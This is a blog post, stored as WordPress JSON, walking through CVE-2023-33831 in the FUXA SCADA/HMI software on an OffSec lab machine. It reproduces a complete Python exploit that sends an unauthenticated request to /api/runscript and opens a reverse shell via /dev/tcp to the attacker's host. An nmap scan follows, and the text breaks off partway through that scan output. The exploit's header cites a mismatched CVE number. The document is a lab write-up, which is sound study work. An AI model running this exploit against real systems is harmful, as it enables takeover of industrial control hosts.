{"id":625,"date":"2024-05-09T18:59:51","date_gmt":"2024-05-09T23:59:51","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=625"},"modified":"2024-05-09T19:02:47","modified_gmt":"2024-05-10T00:02:47","slug":"cve-2023-33831","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","title":{"rendered":"CVE-2023-33831"},"content":{"rendered":"\n<p>This vulnerability allowed remote command execution (RCE) vulnerability in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong>\/api\/runscript<\/strong><\/mark> endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for remote code execution. The affected route is \/api\/runscript, where, it is possible to execute commands without authenticating through the code parameter via the POST method using the child_process module via the exec function.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/frangoteam\/FUXA\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">FUXA<\/a> is a web-based Process Visualization (SCADA\/HMI\/Dashboard) software. With FUXA you can create modern process visualizations with individual designs for your machines and real-time data display. <\/p>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"631\" data-attachment-id=\"626\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/image-61\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?fit=1651%2C1018&amp;ssl=1\" data-orig-size=\"1651,1018\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?fit=1024%2C631&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1024%2C631&#038;ssl=1\" alt=\"\" class=\"wp-image-626\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1024%2C631&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=300%2C185&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=768%2C474&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1536%2C947&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?w=1651&amp;ssl=1 1651w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>You can read more about it on <a href=\"https:\/\/github.com\/frangoteam\/FUXA\/blob\/master\/screenshot\/fuxa-editor.png\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GitHub<\/a>.<\/p>\n\n\n\n<p>This Python <a href=\"https:\/\/github.com\/rodolfomarianocy\/Unauthenticated-RCE-FUXA-CVE-2023-33831\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">exploit<\/a> on GitHub showcases how effortlessly this can be exploited to obtain root access on the machine. The Python script can be seen below:<\/p>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#272822\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)\n# Date: 18\/04\/2023\n# Exploit Author: Rodolfo Mariano\n# Vendor Homepage: https:\/\/github.com\/frangoteam\/FUXA\n# Version: FUXA V.1.1.13-1186\n# CVE: CVE-2022-26134\n# https:\/\/github.com\/rodolfomarianocy\/\n\nfrom argparse import RawTextHelpFormatter\nimport argparse, requests\n\ndef main(rhost, rport, lhost, lport):\n    url = &quot;http:\/\/&quot;+rhost+&quot;:&quot;+rport+&quot;\/api\/runscript&quot;\n    payload = {\n        &quot;headers&quot;:\n            {\n                &quot;normalizedNames&quot;:{},\n                &quot;lazyUpdate&quot;: &quot;null&quot;\n            },\n            &quot;params&quot;:{\n                &quot;script&quot;:{\n                    &quot;parameters&quot;:[\n                    {\n                    &quot;name&quot;:&quot;ok&quot;,\n                    &quot;type&quot;:&quot;tagid&quot;,\n                    &quot;value&quot;:&quot;&quot;\n                    }\n                    ],\n                    &quot;mode&quot;:&quot;&quot;,\n                    &quot;id&quot;:&quot;&quot;,\n                    &quot;test&quot;:&quot;true&quot;,\n                    &quot;name&quot;:&quot;ok&quot;,\n                    &quot;outputId&quot;:&quot;&quot;,\n                    &quot;code&quot;:&quot;require('child_process').exec('\/bin\/bash -c \\&quot;\/bin\/sh -i &gt;&amp; \/dev\/tcp\/%s\/%s 0&gt;&amp;1\\&quot;')&quot; % (lhost,lport)\n                }\n            }\n        }\n    try:\n        response = requests.post(url, json=payload)\n    except requests.exceptions.ConnectionError:\n        print(&quot;url connection error&quot;)\n\nparser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage=&quot;python exploit.py --rhost &lt;ip&gt; --rport &lt;rport&gt; --lhost &lt;lhost&gt; --lport &lt;lport&gt;&quot;)\nparser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost', required=True)\nparser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=&quot;1881&quot;)\nparser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost', required=True)\nparser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport', required=True)\nargs=parser.parse_args()\n\nmain(args.rhost, args.rport, args.lhost, args.lport)\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki monokai\" style=\"background-color: #272822\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88846F\"># Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Date: 18\/04\/2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Exploit Author: Rodolfo Mariano<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Vendor Homepage: https:\/\/github.com\/frangoteam\/FUXA<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Version: FUXA V.1.1.13-1186<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># CVE: CVE-2022-26134<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># https:\/\/github.com\/rodolfomarianocy\/<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> argparse <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> RawTextHelpFormatter<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> argparse, requests<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">main<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">rhost<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">rport<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">lhost<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">lport<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    url <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&quot;http:\/\/&quot;<\/span><span style=\"color: #F92672\">+<\/span><span style=\"color: #F8F8F2\">rhost<\/span><span style=\"color: #F92672\">+<\/span><span style=\"color: #E6DB74\">&quot;:&quot;<\/span><span style=\"color: #F92672\">+<\/span><span style=\"color: #F8F8F2\">rport<\/span><span style=\"color: #F92672\">+<\/span><span style=\"color: #E6DB74\">&quot;\/api\/runscript&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    payload <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #E6DB74\">&quot;headers&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                <\/span><span style=\"color: #E6DB74\">&quot;normalizedNames&quot;<\/span><span style=\"color: #F8F8F2\">:{},<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                <\/span><span style=\"color: #E6DB74\">&quot;lazyUpdate&quot;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&quot;null&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            },<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&quot;params&quot;<\/span><span style=\"color: #F8F8F2\">:{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                <\/span><span style=\"color: #E6DB74\">&quot;script&quot;<\/span><span style=\"color: #F8F8F2\">:{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;parameters&quot;<\/span><span style=\"color: #F8F8F2\">:[<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;name&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;ok&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;type&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;tagid&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;value&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    ],<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;mode&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;id&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;test&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;true&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;name&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;ok&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;outputId&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;&quot;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                    <\/span><span style=\"color: #E6DB74\">&quot;code&quot;<\/span><span style=\"color: #F8F8F2\">:<\/span><span style=\"color: #E6DB74\">&quot;require(&#39;child_process&#39;).exec(&#39;\/bin\/bash -c <\/span><span style=\"color: #AE81FF\">\\&quot;<\/span><span style=\"color: #E6DB74\">\/bin\/sh -i &gt;&amp; \/dev\/tcp\/<\/span><span style=\"color: #AE81FF\">%s<\/span><span style=\"color: #E6DB74\">\/<\/span><span style=\"color: #AE81FF\">%s<\/span><span style=\"color: #E6DB74\"> 0&gt;&amp;1<\/span><span style=\"color: #AE81FF\">\\&quot;<\/span><span style=\"color: #E6DB74\">&#39;)&quot;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">%<\/span><span style=\"color: #F8F8F2\"> (lhost,lport)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        response <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> requests.post(url, <\/span><span style=\"color: #FD971F; font-style: italic\">json<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">payload)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> requests.exceptions.ConnectionError:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&quot;url connection error&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">parser <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> argparse.ArgumentParser(<\/span><span style=\"color: #FD971F; font-style: italic\">formatter_class<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">RawTextHelpFormatter, <\/span><span style=\"color: #FD971F; font-style: italic\">usage<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;python exploit.py --rhost &lt;ip&gt; --rport &lt;rport&gt; --lhost &lt;lhost&gt; --lport &lt;lport&gt;&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">parser.add_argument(<\/span><span style=\"color: #E6DB74\">&#39;--rhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;rhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">action<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;store&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;insert an rhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">parser.add_argument(<\/span><span style=\"color: #E6DB74\">&#39;--rport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;rport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">action<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;store&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;insert an rport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">default<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;1881&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">parser.add_argument(<\/span><span style=\"color: #E6DB74\">&#39;--lhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;lhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">action<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;store&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;insert an lhost&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">parser.add_argument(<\/span><span style=\"color: #E6DB74\">&#39;--lport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;lport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">action<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;store&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;insert an lport&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">args<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">parser.parse_args()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">main(args.rhost, args.rport, args.lhost, args.lport)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:31px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The script is fairly easy to run and it takes the following arguments:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The remote host IP address running <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong>FUXA V.1.1.13-1186<\/strong><\/mark><\/li>\n\n\n\n<li>The port on which FUXA is running<\/li>\n\n\n\n<li>The attacker machine&#8217;s IP<\/li>\n\n\n\n<li>The attacker machine&#8217;s listening port<\/li>\n<\/ul>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>I am using a machine from OffSec\u2019s Proving Grounds lab to demonstrate this vulnerbaility<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will need to scan for open ports on the machine to discover the port on which FUXA is running.<\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#212121\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/\u2026\/PG Machines\/Practice\/Linux\/CVE-2023-33831]\n\u2514\u2500$ nmap -p22,1881 192.168.168.35 -A -oN nmap\/cve-2023-33831\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-09 18:25 CDT\nNmap scan report for 192.168.168.35\nHost is up (0.052s latency).\n\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)\n|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)\n|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)\n1881\/tcp open  http    Node.js Express framework\n|_http-title: FUXA\n|_http-cors: GET POST PUT DELETE\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 13.89 seconds\n\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #EEFFFF\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #EEFFFF\">~\/\u2026\/PG Machines\/Practice\/Linux\/CVE-2023-33831<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-p22,1881<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">192.168<\/span><span style=\"color: #C3E88D\">.168.35<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">nmap\/cve-2023-33831<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #EEFFFF\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #EEFFFF\"> ) at 2024-05-09 18:25 CDT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">192.168<\/span><span style=\"color: #C3E88D\">.168.35<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #EEFFFF\"> (0.052s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #EEFFFF\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: 